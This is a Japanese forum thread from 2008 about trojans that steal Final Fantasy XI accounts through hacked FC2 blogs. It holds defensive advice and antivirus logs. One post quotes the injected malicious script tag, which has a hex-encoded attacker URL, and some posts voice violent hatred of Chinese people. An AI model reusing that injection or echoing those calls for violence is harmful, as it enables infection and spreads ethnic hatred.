●● RMT業者の垢ハックが多発している件14 ●●


1 :既にその名前は使われています:2008/03/24(月) 02:50:21.34 ID:7DTVIQ6X
RMT業者が一般プレイヤーのID・パスワードを盗んで不正にログインし、
アイテムやギルを奪う事件についてのスレッドです。詳細は>>2-10くらい
前スレ→http://live27.2ch.net/test/read.cgi/ogame/1205225002/
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり)
ttp://ort.sakura.ne.jp/taisai/
FF11Warning(ハッキングに重点をおいて詳しくまとめてあります)
ttp://miku.a.orn.jp/miku2/
FFXI Virus問題 まとめサイト(初心者さん向け)
ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★リアルタイムで被害に遭われている方へ★

まずサポセンに電話し、不正アクセスの被害にあっていると伝えましょう(本人確認の後、対処してくれます)
■スクウェア・エニックス インフォメーションセンター
  TEL:0570-003-399(PHSからは03-5333-1860)
  月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
※サポセンが営業時間外の場合は、別アカウントを所持しているならそれでログインしてGMを呼ぶか、
  他にログインできるアカウントがない場合はサポセンが開いてから電話をすることになります。

2 :既にその名前は使われています:2008/03/24(月) 02:50:50.08 ID:7DTVIQ6X
■アカウントハックとは
主に中国のRMT業者(※1)がFF11関係のサイト(blogや情報サイト等)にアカウント情報を吸い出せる
罠ツールを仕掛けたサイトアドレスを貼り、FF11プレイヤーにそれを踏ませることにより
IDとpassを盗んで不正にログインし、所持アイテムやギルをを奪ってしまう(※2)行為の事です。
ログイン時にパスワードも変更され利用者本人がログイン出来なくなることも多々あります。

奪われたアイテムは各鯖にいるアイテム販売用キャラ(※3)が競売や店売りしてる模様。

※1:blogへの書き込みIP、リンクで飛んだ先のHPアドレスの所持者を調べると中国な為
※2:アイテムを奪われるだけの人も居れば、サーバー移動させられてたりキャラが消されていたりと多種多様の報告があります。
※3:Luckshop等、確認できるだけで21の鯖にいる業者の販売担当キャラ。FFAHで履歴調べると色々分かります

3 :既にその名前は使われています:2008/03/24(月) 02:51:08.68 ID:7DTVIQ6X
■予防と自衛が各プレイヤーに求められています。
被害に遭わないためにも各自でできる限りの防衛手段を身に着けておきましょう。
【公式より抜粋】

▼内容が不明なサイトにアクセスしない
 ※blogのレスの名前部分(HPアド)にリンクをつけてリンクアドレスを見せないようにする手口もあります。
 絶対にリンクを押す前にアドレスを見る事

▼不明なサイトにあるソフトウェアのダウンロードを不用意に行わない

▼Microsoft Update(Windows Update)を定期的に実行し、Windowsを常に最新の状態に保つ
 ※詳しくはマイクロソフト社の公式サイトを参照のこと。

▼利用しているWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する

▼スクウェアエニックス社が使用を認めていない外部ツールを絶対に使用しない

▼ウイルス駆除ソフトを常に最新のバージョンで使用する

4 :既にその名前は使われています:2008/03/24(月) 02:51:55.37 ID:7DTVIQ6X
■具体的な自衛策
1:ウイルススキャンソフトを導入する。
  ・シマンテック、カスペルスキー、マカフィー、トレンドマイクロ社のソフトを有料で購入する。
  ・AVG、AntiVir、avast!、BitDefenderなどの無料ソフトをダウンロードして使用するという手もあります。

2:WindowsUpdateでWindowsを最新の状態にする
   Windowsは最初にインストールしただけで万全というわけではなく、次々と発見されるセキュリティホールを
   後付で修正し、それをWindowsUpdateで配布することで安全性を保つようにできています。
   一般的には自動更新がされるよう設定されていますが、重いからという理由で自動更新機能を
   オフにしている人もいると思います。その場合は必ず定期的に手動で更新を行ってください。

3:ファイアウォールを有効にする
  ・1に上げた有料ソフト等に同梱されているものや、同じ会社から出ているものを使う

  ・ベクターや窓の杜などでフリーのファイアウォールソフトを探し、導入する
   (2chカテゴリ「ネット関係」>「セキュリティ」板にフリーのファイアウォールソフトの
    スレッドがあります。「ファイアウォール」などの単語で検索してください)

5 :既にその名前は使われています:2008/03/24(月) 02:52:01.80 ID:EkJgurYg
業者あげ

6 :既にその名前は使われています:2008/03/24(月) 02:52:10.54 ID:7DTVIQ6X
■具体的な自衛策その2

4:IPフィルタを導入する
  PeerGuardian2というフリーソフトで特定の国(この場合は特に中国)のIPへのアクセスを遮断できます

  ★PeerGuardian2の導入・設定方法はここから
    リネージュ資料室 ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html
    このURLを踏みたくない人はgoogleで『リネージュ資料室』で検索してメニューから
    セキュリティー対策→IPフィルタ で確認してください。

5:IE以外のウェブブラウザを使用する
  Firefox、Opera、など。
  ただしそれぞれのブラウザにもセキュリティホールが見つかることもあるので、
  ブラウザ自体のアップデートも行う必要があります。

6:不審な・見覚えの無いURLを踏む必要がある場合は、まずaguse.jpやソースチェッカーを使用する。
  ttp://www.aguse.jp/ 
  URLを入力するとそのページのSSとドメイン情報、各ブラックリストに照らし合わせた結果が表示されます。
  ソースチェッカーにはWebページ上のものと、DLして使用できるフリーソフトがあります。

7 :既にその名前は使われています:2008/03/24(月) 02:52:30.81 ID:7DTVIQ6X
■もし被害に遭ってしまった場合
「ある日突然登録してあるパスワードでログインできなくなった」もしくは「ある日ログインすると
キャラクターのアイテムやギルが奪われていた」等の、不正アクセスと思しき被害にあった場合は、
まず>>1にあるサポセンの連絡先に電話してパスワードの再発行を受けたり、不正アクセスの被害を
受けたことを報告しましょう。

現時点(平成19年10月下旬)でのスクウェアエニックス社インフォメーションセンターの。不正アクセス被害者への
対応は、「社内の調査だけでは不正アクセスと断定することができない」という調査結果の報告のみです。

不正アクセスと断定できないとはつまり、「RMT業者に自発的にアイテムやギルを受け渡したのは
被害者本人である」ということにされている状態です。

この状態の打開及びさらなる追及を望むならば、警察への届出が必要になります。
不正アクセス行為の禁止等に関する法律、通称不正アクセス禁止法においては、
こういった事例での被害者は「不正アクセスをされた側」つまりスクウェアエニックス社になりますが、
アカウントを乗っ取られた側でも「利用権の侵害」として被害を届出することができます。

8 :既にその名前は使われています:2008/03/24(月) 02:52:49.34 ID:7DTVIQ6X
■警察への通報方法
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
  都道府県警察本部のサイバー犯罪相談窓口等一覧
  ttp://www.npa.go.jp/cyber/soudan.htm

2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
  (この段階を踏まずに直接所轄署に行くと、「専門の窓口に連絡しろ」と言われてしまう可能性があります)

3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。

4:資料を持参して所轄の署に赴き、「利用権の侵害」での被害を報告します。
  「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが、
  家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
  利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。

9 :既にその名前は使われています:2008/03/24(月) 02:53:03.17 ID:7DTVIQ6X
■警察へ行く際に持っていく・用意しておくもの
過去スレで実際に警察へ行った被害者のレスから抜粋

もっていったもの †
o スクエニの会社情報 HPのプリントアウトしたもの
o プレイオンラインサポセンの電話番号
o 印鑑、身分証明
受け答えしてくれたサポセンの人の名前も伝えるといいかも


警察で聞かれたもの †
o プレイオンラインのIDとパスワード
o キャラ名
o 犯行時間帯
o 被害内容(なくなったゲーム内通貨・アイテム)
o プロバイダ

10 :既にその名前は使われています:2008/03/24(月) 02:53:56.36 ID:7DTVIQ6X
■このスレの目的
1:予防・自衛の徹底の周知
2:被害報告の収集
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする

★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください

☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」、「被害者の会を作れ」等の議論も
この場で行ってくださって構いませんが、スレを見に来た一見さんの質問や被害者の報告は
無視せずに対応してください。

11 :既にその名前は使われています:2008/03/24(月) 02:54:22.50 ID:7DTVIQ6X
■アカウントハックの救済について署名して下さい
ttp://www.petitiononline.com/FFvoice/petition.html
[Click Here to Sign Petition]=請願に署名して下さる方はこちらをクリックして下さい。

Name=名前(必須)  Email Address=メール(必須)  Real name=本名(任意)  Server name=サーバー(必須)

Email Address Privacy Option=メールアドレスプライバシーオプション
:Private=署名妥当性確保のためのメールアドレスですプライベートでスクウェアに提供されません
:Available to Petition Author=プライベートですがスクウェアに提供されます
:Public=全ての人が閲覧可能です

[Preview Your Signature]=貴方の署名を確認します

View Signatures Without Signing=署名をしないで他の署名を見ます

12 :既にその名前は使われています:2008/03/24(月) 03:04:30.88 ID:vQXYTLxz
>>1



ウエブマニー組で今現在パス抜き被害あってないから安心したってやってたら、課金後
に被害食らうかもしれんね。

13 :既にその名前は使われています:2008/03/24(月) 03:05:44.32 ID:EkJgurYg
紙媒体しか安心して見れないこんなFFじゃ

14 :既にその名前は使われています:2008/03/24(月) 03:16:22.91 ID:mYAh1jWO
RMTする人達が減ったのかな?o(`ω´*)o

15 :既にその名前は使われています:2008/03/24(月) 03:19:43.83 ID:euFX6pRg
中国はマジで腐った国だな。

16 :既にその名前は使われています:2008/03/24(月) 03:21:27.29 ID:BS8RD3fS
いちょつ

17 :既にその名前は使われています:2008/03/24(月) 03:22:44.14 ID:BS8RD3fS
前すれ>>995
あいあい
こっちに移動したよ

18 :既にその名前は使われています:2008/03/24(月) 03:24:47.93 ID:IxSaroBR
カスペのオンラインスキャンが動くブラウザを使わないほうがいいぞ
あれが動かないブラウザのほうがセキュリティ的には信用できる
オペラなんて罠ページ踏んでも(だいたい)平気だぜ・・・普通のページも見れないことあるが・・・

19 :既にその名前は使われています:2008/03/24(月) 03:34:30.07 ID:xPk7dngc
>>15
自分が痛くなければ何やっても愛国無罪な国だからな

20 :既にその名前は使われています:2008/03/24(月) 03:43:51.91 ID:l9SAEJ0+
>>13
poizun

21 :既にその名前は使われています:2008/03/24(月) 03:50:16.95 ID:Df86aKNo
ヴァナモンブログちょっとひどくね?
改ざんされたことを責めるつもりは毛頭ないが、そのことに触れずにしれっと直して
あたかもなにもありませんでした、みたいなのはチキンすぎる。
自分のブログに訪れてくれた読者に対して申し訳ないとか思わないのかね?
こういうのを認めると今後そういうやつが増えて被害拡大するとおもうんだ。

22 :既にその名前は使われています:2008/03/24(月) 03:54:32.57 ID:vQXYTLxz
ネットは自己責任。
叩き所が間違ってる。

23 :既にその名前は使われています:2008/03/24(月) 03:56:10.23 ID:ExAbIYmH
まぁ注意喚起位すればいいとは思うけど、fc2のせいであってヴァナモンのせいじゃないしな。
どちらかといえばfc2がページの上に告知するとか
問題を抜本的に解決できるような方法を提示しないこと、またそれを実行しないことが問題。

24 :既にその名前は使われています:2008/03/24(月) 03:59:36.99 ID:8jcNID1A
前スレ57, 63( http://live27.2ch.net/test/read.cgi/ogame/1205225002/57,63 )の
xia.exeを実行してカスペルスキー試用版でのスキャン終了

(1/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\05S94ZKH\1ro[1].exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8DUF8TQ3\laoie[1].exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8X2ZG5A3\geizi[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\CNA1O3S3\3ff11[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\S1ANG1QF\2t1[1].exe
検知: トロイの木馬 Trojan-Downloader.Win32.Delf.dsz
 →ファイル: C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\WINDOWS\Help\3EC849F38E63.dll
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\WINDOWS\Help\3EC849F38E63.exe

25 :既にその名前は使われています:2008/03/24(月) 04:00:24.85 ID:8jcNID1A
(2/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
 →ファイル: C:\WINDOWS\system32\1.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\WINDOWS\system32\2.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
 →ファイル: C:\WINDOWS\system32\3.exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
 →ファイル: C:\WINDOWS\system32\4.exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
 →ファイル: C:\WINDOWS\system32\5.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.pnr
 →ファイル: C:\WINDOWS\system32\krnp32drv.dll
検知: アドウェア not-a-virus:AdWare.Win32.BHO.aj
 →ファイル: c:\windows\system32\xunleibho_001.dll

こんな感じ

26 :既にその名前は使われています:2008/03/24(月) 04:03:02.46 ID:Q/ktx4QO
>>21
ヴァナモンブログ主を責めるのはちょっとひどくね?
改ざんされたテンプレートをそのまま放置しているfc2を責めることをせずに、
個人を叩いてひゃっほい、みたいなのはチキンすぎる。
運営しているサイトに訪れてくれた読者に対してfc2は申し訳ないとか思わないのかね?
こういうのを認めると今後こういう運営をするやつ増えて被害拡大するとおもうんだ。

であろう?

27 :前スレ969:2008/03/24(月) 04:06:50.23 ID:Vn0/fEwr
カスペルのスキャンが1時間早く終わったーヽ(´ー`)ノ
結果はバスターさんの前に使ってたノートン先生の置き土産が、マルウェアに勘違いされたくらいですた。

以前から使っていたPG2とFirefox&IFRAMEの禁止、今回のカスペルくらいが
自分みたいな素人ができる自衛手段ですかのう。

あ、今使ってるHUBの機械が8年前から使ってるcoregaっていうメーカーのなんだけど、これってマズイ?(´・ω・`)

28 :既にその名前は使われています:2008/03/24(月) 04:13:56.30 ID:Df86aKNo
もちろんまずはfc2が何か言うべきとは思うけどさ。
今後まだまだ改ざんブログが増えるであろうことを考慮すると
その事実を個人レベルで隠蔽するような行為はどうかと思ったんだ。
このスレ的にはブログで事実報告の必要は無いって意見が多いってことか、了解。

29 :既にその名前は使われています:2008/03/24(月) 04:16:01.17 ID:Q/ktx4QO
Trojan.Win32.Inject.agc
 まず、こいつがきっかけで次のダウンローダを起動する。
Trojan-Downloader.Win32.Delf.dsz
 次の4種のワームをダウンロードし、常駐させる。
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.lbb
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.pnr
 各MMOに対応したID/pw保存ファイルサーチャ
Backdoor.Win32.Hupigon.dsx
 上記4種のワームが検出したID/pw保存ファイルを
 どこぞに送信するためのポートを開けるとともに
 遠隔操作用のポート開けて常駐して待機する。

そして、見事にBOT-NET入りを果たすと。

30 :既にその名前は使われています:2008/03/24(月) 04:26:34.88 ID:B+yN8em4
いつも見てるFF系ブログの大半がFC2だったわ・・・・
カスペでスキャンしてなんともなかったから良かったが、怖くて暫くはブログ見れないな。

31 :既にその名前は使われています:2008/03/24(月) 04:26:41.08 ID:Q/ktx4QO
>>28
いいか?
改ざんしたのはブログ主ではなく、悪意のテンプレートにしたやつがいて
悪意のあるテンプレートを供給していた運営者がいるんだよ。

つまり、
 改ざんしたテンプレートを運営者に出したやつが主犯
 そのテンプレートをまともにチェックせずに公開したやつが共犯
なのさ。
本当に叩く先がどこか分かるよな?

確かに注意勧告をブログ主もするとベターだろうが、
ブログ主もクラックされた被害者な訳だ。

32 :既にその名前は使われています:2008/03/24(月) 04:28:56.31 ID:uo1cC9cX
手動でパス打つほうが危ないなんてことは・・・ないよね?

33 :既にその名前は使われています:2008/03/24(月) 04:31:35.92 ID:Q/ktx4QO
>>30
BLOGを読むときの手として、直接行くのではなく、RSSリーダで読むのもあり。
なぜかというと、直接行くと、テンプレートを含む全体を読み込むが
RSSリーダならば、本文しか普通は読み込まない「はず」

34 :既にその名前は使われています:2008/03/24(月) 04:32:51.75 ID:juaPfmeM
でもさ、ヴァナモンblogで感染して
それを知らずに感染したまま今もヴァナモンblogを見ている人もいると思うんだよね。

叩く矛先の優先順位の問題ではないと思うんだ。

35 :既にその名前は使われています:2008/03/24(月) 04:34:12.73 ID:Q/ktx4QO
>>32
>>29のTrojan-PSW.Win32.OnLineGamesの4つが
キーロガーに変わったらどうなるだろうね?

どっちが安全なんてないね。
つか、キーロガーの方が広範囲に情報取れるな。

36 :既にその名前は使われています:2008/03/24(月) 04:35:57.93 ID:Df86aKNo
>>31
わかった、っつってるのに粘着なヤツだなw

>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ
今のところこれに関しては事実関係が確定してないと思ってたんだが確定したのか?


37 :既にその名前は使われています:2008/03/24(月) 04:36:36.60 ID:vQXYTLxz
そこまで粘着するなら本人に言えとしか、是非をうんぬんするスレじゃないよ。

38 :既にその名前は使われています:2008/03/24(月) 04:37:03.15 ID:/fj6dMAF
ちょっと聞きたいんですけど
ヴァナモンblogではなく
ヴァナモンでのモンスター検索の方は大丈夫なんでしょうか?
個人的にblogは見ずに検索だけをメインにしてたので・・・


39 :既にその名前は使われています:2008/03/24(月) 04:37:42.86 ID:l9SAEJ0+
個人にそういう役目を担わせる義務はないだろうから
人目につくネ実で、スレ保持/情報共有、注意呼びかけるなど。
有志アカハク専用サイトあんだし。

40 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 04:37:53.33 ID:0CiVccUT
>>21
テンプレ改竄問題は知ってたけど、
ウチがテンプレ改竄されたの今知って飛んで来たところなんだが
毎日毎日業者のコメントがウザかったので丁度数日前にhttp://をNGワードにしたんだよな
その報復なんだろうか
でテンプレチェックしてるんだけど、どう直せばいいのか教えて欲しいんだが
テンプレには%77とか入ってないぞ?

41 :既にその名前は使われています:2008/03/24(月) 04:38:13.47 ID:8jcNID1A
ノートンが検出できない4種類のファイルを検体としてシマンテックに送付した

42 :既にその名前は使われています:2008/03/24(月) 04:38:46.92 ID:TfhGREOv
>>27
8年前程度なら、すでにバカHUB入手しづらくなってたと思うから、
スイッチングHUBじゃね?



43 :既にその名前は使われています:2008/03/24(月) 04:39:47.13 ID:Xxx+f+/4
粘着っつうか、過剰擁護に反論してるだけだろ

44 :既にその名前は使われています:2008/03/24(月) 04:40:06.77 ID:Q/ktx4QO
>>34
fc2がテンプレートの配布と利用を止めたらどうなるかね?
読めないのを不思議に思って、読者は何かするんじゃないか?
まぁ、何もしない読者だから感染するんだけどさ。

「ブログ主が注意勧告するのはベターだ」が、
自責としてメインで動くべきは運営側であろう?

45 :既にその名前は使われています:2008/03/24(月) 04:43:33.34 ID:8jcNID1A
>>40
ヴァナモンの人こんばんは
私が夕方に見たときにはすでに無くなってたのでなんとも

46 :既にその名前は使われています:2008/03/24(月) 04:43:37.03 ID:Df86aKNo
>>40
本人キター、って・・・あれ?直してないの?
ソースチェッカーで改ざんされてたのをオレは確認してて、
ソースが消えたのも確認したんだが・・・・なんで消えたんだろう?

47 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 04:44:07.46 ID:0CiVccUT
というかもう直ってるの?>>21でしれっと直してって書いてあるんだけど
俺は何も弄ってないんだけどな

3週間くらい前だったかな?ブログにFC2のブログがハックされて〜
ヴァナモンさんも注意してくださいってブログにコメントくれた人が居たんだよね
でその時もチェックしたけどそれっぽいのは無かったし

48 :既にその名前は使われています:2008/03/24(月) 04:44:15.26 ID:juaPfmeM
>>44
だからその「サイトで勧告するのがベターだよね」という話でしょ。
FC2よりもまずヴァナモンを叩くという話ではないはずなのに
なぜかそういう方向へ持っていって擁護されるんだよね。

49 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 04:45:27.27 ID:0CiVccUT
とりあえず前スレを確認してきます

50 :既にその名前は使われています:2008/03/24(月) 04:49:01.17 ID:vQXYTLxz
しれっと直してやのその事実を個人レベルで隠蔽するような行為やの書いてる
奴は叩きと認識されるでそ。

FF取り上げる全てのサイトやネ実でななしやロカルーででかでかと注意喚起すべき
だろうけどね。

51 :既にその名前は使われています:2008/03/24(月) 04:49:45.63 ID:rpE40Jdl
iframeもなかったのかな。勝手に消えたって、業者が埋め込んでまた消すってあるのかな???

52 :既にその名前は使われています:2008/03/24(月) 04:50:12.06 ID:uo1cC9cX
ここまで、話題になったんだから、国レベルで、どうにかしてほしいもんだ

53 :既にその名前は使われています:2008/03/24(月) 04:53:02.27 ID:5r7sQEdf
中国人は最近ではチベットの件とかいろいろ物議醸し出してるからなぁ
それでなくても「中国、韓国お断り」は俺の知ってる世界では常識だし

国レベルで中国に核を落としてくれたらいいのにね

54 :既にその名前は使われています:2008/03/24(月) 04:53:53.96 ID:QCo+vR7/
>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ

ここは私も気になる所です
ブログのテンプレはDL以降、ブロガー個人での管理になるから
有名ブログのテンプレ改竄はブログ管理のID・passの漏洩によって
発生する場合が大半だと思っていたけど実際はどうなんでしょうか?

悪意のあるテンプレートが公開されているケースもないとは言えませんが

55 :既にその名前は使われています:2008/03/24(月) 04:54:41.34 ID:dI49kwAF
>>46
仕込まれてたのはscript?
iframeなら広告が原因だろうか。

56 :既にその名前は使われています:2008/03/24(月) 04:55:15.07 ID:Q/ktx4QO
中国自体が核保有国だから、なんかしでかしてくれるのを期待したいw

57 :既にその名前は使われています:2008/03/24(月) 04:56:23.92 ID:A+UNPr50
>>47
エントリーのブロックが終わって
<<--!コメント-->>の直下に
<script language="javascript"
 src="hxxp://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>
こんなんがあった
本来はhttpだったが誤アクセス防止にxxにしといた。

本人が直したんじゃないってことはグーグルに気づかれたために業者が直したかのかな
ヴァナモンをグーグルで検索すると危険サイトに指定されている。

58 :前スレ969:2008/03/24(月) 04:57:03.38 ID:Vn0/fEwr
>>42
おお、ありがとう。
家族がネットでの自己防衛に無頓着&家族にすらPC触らせたがらないんで心配だったんよ(´・ω・`)
大丈夫そうなんで、当分の間HUBはいまの機械使っておくよ。
さすがにやばいんで寝る。
夜までこのスレが生き残っていることを祈りつつあげ!

59 :既にその名前は使われています:2008/03/24(月) 04:58:18.68 ID:A+UNPr50
>>55
広告が原因って意味不明なんだが
ちなみに黒魔の軌跡のところは最初iframeだったのがいつのまにかscriptにかわってた
業者が何度も改竄してるとみるべきじゃねーか?

60 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 05:02:56.71 ID:0CiVccUT
3/19の夜にhttp://をNGワードにしたんだよな
それからパッタリ業者のコメント無くなってたんだが
それの報復ぽよなぁ。
となると3/19以降に仕掛けられた可能性が高いと思う。
つーか他のFC2のサイトと違うテンプレ使ってるし
防ごうとして防げるのこれ?

61 :既にその名前は使われています:2008/03/24(月) 05:03:26.19 ID:l9SAEJ0+
ヴァナモンのグーグルの表示が危険URL指定なのか
確かめたら本当だった
http://tune.ache-bang.com/~vg/outitem/up/img/19041.jpg

62 :既にその名前は使われています:2008/03/24(月) 05:04:26.58 ID:A+UNPr50
>>60
テンプレ何つかってるとかそういう問題じゃない
あとNGとか関係ねーとおもうよ
割とアクセス多いところを狙ってるみたいだし

最初は検索トップにでるサイトだけだったが
今はなりふり構わず無差別になりつつある

63 :既にその名前は使われています:2008/03/24(月) 05:05:16.22 ID:mrzccnLo
>>32
ID Managerとかは使えないの?キーロガーには引っかからない&クリップボード経由でもなくなる。
PCじゃFFしないから知らないけどw

64 :既にその名前は使われています:2008/03/24(月) 05:05:57.77 ID:rpE40Jdl
報復ってより、今はどこもコメント承認制だったりで
てっとり早く感染させられる改竄の方主流にしだしたとかかもですね

65 :既にその名前は使われています:2008/03/24(月) 05:06:05.62 ID:Q/ktx4QO
>>57
それ、まだ生きてるな。
ActiveX起動して、www■fccja■com/d2.aspに飛ばしとる。
で、%うんたらってとこからすると、UTFじゃない?

66 :既にその名前は使われています:2008/03/24(月) 05:06:33.24 ID:Df86aKNo
>>60
自分で直したんじゃないのなら業者が再利用するために消したって可能性あるね。
まずはfc2のパスワード変えてみたらどうだろう?

67 :既にその名前は使われています:2008/03/24(月) 05:09:43.58 ID:Q/ktx4QO
>>61
うひ、誰ぞサイトアドバイザに報告したのがいるんだわw

68 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 05:20:56.66 ID:0CiVccUT
えーとそれで、ウチ見て感染した場合はカスペルキーとかいうのでチェックがいいのかな?
普通のウイルススキャンじゃ引っかからない?
googleのキャッシュはブログが有害指定されてるから無いっぽいので
いつのキャッシュから判断してるのか分からないけど
土曜の深夜に誰か気づいたってことは、仕込まれたのやっぱ先週中頃以降じゃないのかなぁ
ヴァナモンで検索して>>61になったら誰かすぐ気づくだろうし

69 :既にその名前は使われています:2008/03/24(月) 05:21:04.67 ID:Q/ktx4QO
時期と手口からすると、これ近いんじゃないかと思ったり。
 ttp://www.itmedia.co.jp/news/articles/0803/14/news018.html

70 :既にその名前は使われています:2008/03/24(月) 05:24:10.66 ID:Q/ktx4QO
>>68
今まで検出してくれた報告があるのは、カスペルスキーだけですな。
オンライン版
 ttp://www.kaspersky.co.jp/virusscanner
体験版
 ttp://www.kaspersky.co.jp/trials
を紹介しておくとよいかも?

71 :既にその名前は使われています:2008/03/24(月) 05:25:08.58 ID:zadZE9R9
管理できないなら削除しろ

大きな被害でてるぞ

72 :既にその名前は使われています:2008/03/24(月) 05:26:24.57 ID:XNnaYNDD
ほんとに業者やりたい放題だな
FC2運営内部にRMT関係者か金を貰って工作している奴がいるとしか思えん
対策出来ない以上はblogを見ないという選択肢しか無いじゃん

73 :既にその名前は使われています:2008/03/24(月) 05:28:54.65 ID:l9SAEJ0+
今の所ブログのみで、
HPコンテンツ等のメインサーチの方は
改ざんなさそうだね。

74 :既にその名前は使われています:2008/03/24(月) 05:30:14.79 ID:nn2RN4KX
>>69
そこのサイトの過去の記事ttp://www.itmedia.co.jp/enterprise/articles/0803/12/news112.html
に、同社によれば、このマルウェアはオンラインゲームの情報をPCから盗み出すタイプだと推定されるという。
という件があるな。

75 :既にその名前は使われています:2008/03/24(月) 05:31:10.21 ID:dI49kwAF
落ち着くまで、パスワードかけて非公開にしとくとか。
パス認証画面が安全かどうかは分からんのだが。

76 :既にその名前は使われています:2008/03/24(月) 05:43:24.08 ID:f8U+hHlG
>>68
いまいち原因把握出来て無さそうだし、一時的にでもブログ停止した方がよくないか?
今まで随分お世話になって偉そうな事を言うのもあれだが、いつまたやられるかわからんぞ



77 :既にその名前は使われています:2008/03/24(月) 05:51:44.38 ID:sV5MTkg6
ヴァナモンブログが利用していたテンプレートに最近何か仕込まれて、今日までにかなり感染した。
現在では、そのテンプレートは何も仕込まれてないものに修正されている。

こういうことか?

テンプレの提供元であるfc2に問題があると?

78 :既にその名前は使われています:2008/03/24(月) 06:01:37.22 ID:9jGDstCn
"%77%77%77%2E%〜" ってのは普通の人間はぱっと見が書かれてるか判らん罠。
URLを16進コードで書いたもので"www.〜"ってコトなんだけど
ブラウザが自動変換してたら%77で検索しても意味無いかも。

>>57に書かれてる謎の文字列を変換するとhellh■netへのurlになる。


79 :既にその名前は使われています:2008/03/24(月) 06:31:03.34 ID:8CSFG+dl
こんな時間に新スレ移行したのか、いちおつ。
もしかしたらまとめの人がログ取り切れてないかもしれないから、
誰か一応前スレのログを保存しといてくれ。俺は携帯なんでできないんだ

80 :既にその名前は使われています:2008/03/24(月) 06:41:19.69 ID:QCo+vR7/
FC2から公開されている段階のテンプレには(おそらく)問題なく、
テンプレをDLした後に、ブログの管理画面で利用者(ブロガー)個人がテンプレの
ソースを改変することが出来るから、そこで改竄されたんだと思っています。

FC2ブログの管理画面に行く際に必要なIDとpassの内
IDはそのブログURLの一部に使われているから一目瞭然で、passだけ判明してしまえば
ブログ管理画面にいけてしまうんですよね

passだけなら総当りで試行すれば簡単に一致してしまいそうな気が…

私もFC2でブログを書いているんですが、これを気に閉鎖しようと思っています

81 :既にその名前は使われています:2008/03/24(月) 06:57:03.29 ID:hdKDzAOI
試しにカスペルスキーのオンラインスキャンしたら
こんな物が引っかかったのだけれど…
ググってもよくわからん

not-a-virus:PSWTool.Win32.Messen.n

これってやられちゃってる?(ノω`)

82 :既にその名前は使われています:2008/03/24(月) 07:01:42.72 ID:JYmJyemP
カスペ関連で一気にFF潰せそうな勢いだなの

83 :既にその名前は使われています:2008/03/24(月) 07:04:39.69 ID:n0XTFGnb
中国人を 一日3人まで殺しても 罪にはなりません^^

84 :既にその名前は使われています:2008/03/24(月) 07:18:44.68 ID:A+UNPr50
>>80
IDつかわれてねーよ
お前がぬるいだけじゃねーの

85 :既にその名前は使われています:2008/03/24(月) 07:22:21.89 ID:rCHR+RwE
おはようございます。起きたら終わってました。

報告です。

ターゲットの選択: マイ コンピュータ
ソース: A:\; C:\; D:\; E:\; F:\; G:\;

E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\H8OJH9OT\t1[1].exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\SBT7I6Z1\ff11[1].exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\Program Files\Common Files\Microsoft Shared\MSInfo\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067565.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
